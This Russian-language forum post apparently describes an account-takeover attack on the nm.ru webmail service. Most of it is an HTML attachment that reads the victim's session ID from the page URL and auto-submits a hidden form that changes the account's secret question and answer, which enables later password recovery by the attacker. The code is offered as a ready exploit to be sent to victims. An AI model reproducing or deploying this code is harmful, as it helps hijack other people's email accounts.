Да это развод, только явно не вас. Есть 2-е формы секретный вопрос и секретный ответ... Есть форма настроек данных и есть поле маил. На все эти формы пароль не требуется
Под почтовый клиент, естественно js может и не пахать(например в бате), поэтому придется крепить html'ку. Это конечно пока толька идеи, но мне кажется что ид-ешник получится вытащить из хистори(так как в почтовом клиенте больше ее вы тащить не откуда). Для особо не верущих этот код:
<html>
<script>
var stroka=location+'#';
var sid=stroka.substr(98,32);
</script>
<form method="POST" name="forma">
<INPUT type="hidden" name="session_id">
<INPUT type="hidden" value="1" name="cp_msg">
<INPUT type="hidden" value="1" name="__post">
<INPUT type="hidden" name="cp_quest" value="Ни рыба, ни мясо?и не курица тоже

">
<INPUT type="hidden" name="cp_answ" value="321123">
<INPUT type="hidden" method="POST" value="Внести изменения">
</form>
<script>
forma.action="
http://www4.nm.ru/users/chpass.dhtml...id="+sid;
forma.session_id.value=sid;
document.forma.submit()
</script>
</html>
Этот js меняет лишь секретный вопрос и ответ...
з.ы. Скрипт работает только в прикрепленном файле с именем "Ready exploit for hotmail.ru.html". Сами понимаите измените имя фаила, изменится локатион. Скрипт работает только вод веб-интерфейсом
Это так сказать тестовая версия

За полной обращайтесь в фсб

)